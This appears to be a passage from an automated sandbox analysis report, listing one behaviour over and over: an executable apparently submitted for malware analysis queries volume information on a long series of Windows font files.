Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
